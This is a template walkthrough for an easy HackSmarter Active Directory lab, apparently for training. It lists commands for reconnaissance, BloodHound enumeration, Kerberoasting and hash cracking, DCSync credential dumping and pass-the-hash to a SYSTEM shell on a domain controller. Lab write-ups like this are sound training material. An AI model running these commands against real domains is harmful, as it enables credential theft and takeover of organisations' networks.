Lab: Welcome · Platform: Active Directory · Difficulty: Easy · Provider: HackSmarter
This is a template walkthrough — replace the placeholder values (
<TARGET_IP>, hashes, flags) with your own findings as you work the box. Keep the structure; it mirrors how a real engagement is documented.
Overview#
Welcome is the on-ramp to the HackSmarter Active Directory series. It’s an assumed-breach scenario: you start with a low-privileged domain credential and work toward Domain Admin by chaining standard AD misconfigurations. The goal isn’t a single trick — it’s drilling the enumeration → foothold → privilege-escalation loop until it’s muscle memory.
Skills exercised
- AD enumeration (BloodHound / ldapsearch /
nxc) - SMB and LDAP recon
- Credential abuse and lateral movement
- Mapping an attack path to Domain Admin
1. Recon#
1.1 Initial port scan#
Always start broad, then go deep on what’s open.
# Full TCP scan, then service/version scan on discovered ports
nmap -p- --min-rate 2000 -oA nmap/alltcp <TARGET_IP>
nmap -p 53,88,135,139,389,445,464,593,636,3268,3269 -sCV -oA nmap/svc <TARGET_IP>The classic Domain Controller fingerprint: 53 (DNS), 88 (Kerberos), 389/636 (LDAP/S), 445 (SMB), 3268 (Global Catalog). That tells you you’re looking at a DC before you’ve touched a single credential.
1.2 Pin the domain and hostname#
nxc smb <TARGET_IP>SMB <TARGET_IP> 445 DC01 [*] Windows Server ... (name:DC01) (domain:welcome.hacksmarter.local)Add it to your hosts file so Kerberos and tooling resolve names cleanly:
echo "<TARGET_IP> dc01.welcome.hacksmarter.local welcome.hacksmarter.local dc01" | sudo tee -a /etc/hosts2. Authenticated Enumeration#
You were handed a starter credential. Validate it first:
nxc smb <TARGET_IP> -u 'user' -p 'password' --sharesA
[+]fromnxcwith valid creds is your green light. If you seeSTATUS_LOGON_FAILURE, recheck the username format (uservsuser@domainvsDOMAIN\user) and clock skew (Kerberos is picky —sudo ntpdate <TARGET_IP>).
2.1 Collect with BloodHound#
Graph the domain — it’s the single highest-leverage move in any AD box.
bloodhound-python -u 'user' -p 'password' -d welcome.hacksmarter.local \
-ns <TARGET_IP> -c All --zipImport the zip into BloodHound and run the pre-built queries:
- Find Shortest Paths to Domain Admins
- Find Principals with DCSync Rights
- Shortest Path from Owned Principals
Mark your starting user as Owned, then let the graph show you the path.
2.2 Users, shares, and quick wins#
# Enumerate domain users
nxc smb <TARGET_IP> -u 'user' -p 'password' --users
# Spider readable shares for loot (configs, scripts, creds)
nxc smb <TARGET_IP> -u 'user' -p 'password' -M spider_plus3. Foothold / Privilege Escalation#
Document the specific misconfiguration you abused here. On an easy AD lab this is usually one of: Kerberoasting a service account, an ACL edge (e.g.
GenericWrite/ForceChangePassword), or readable credentials in a share/GPO.
Example — Kerberoasting, if BloodHound flags an SPN-bearing account:
# Request service tickets for crackable hashes
impacket-GetUserSPNs welcome.hacksmarter.local/user:password -dc-ip <TARGET_IP> -request -outputfile spns.hash
# Crack offline
hashcat -m 13100 spns.hash /usr/share/wordlists/rockyou.txtThen validate the recovered credential and move along the BloodHound path:
nxc smb <TARGET_IP> -u 'svc_account' -p '<cracked_password>'4. Domain Admin#
Once the attack path lands on a privileged principal, dump the domain and prove it:
# DCSync if you've reached an account with replication rights
impacket-secretsdump welcome.hacksmarter.local/<priv_user>:'<password>'@<TARGET_IP># Pass-the-Hash to a SYSTEM shell on the DC
impacket-psexec -hashes :<NTLM_HASH> welcome.hacksmarter.local/administrator@<TARGET_IP>nt authority\systemFlags#
| Flag | Location | Value |
|---|---|---|
| User | C:\Users\user\Desktop\user.txt |
REDACTED |
| Root | C:\Users\Administrator\Desktop\root.txt |
REDACTED |
Lessons Learned#
- BloodHound first. On AD, the graph turns a maze into a straight line. Always mark owned principals.
- Credential hygiene is the vuln. Easy AD boxes almost always hinge on a reused/weak/exposed credential, not an exploit.
- Kerberos is time-sensitive. Sync your clock to the DC before anything Kerberos-related.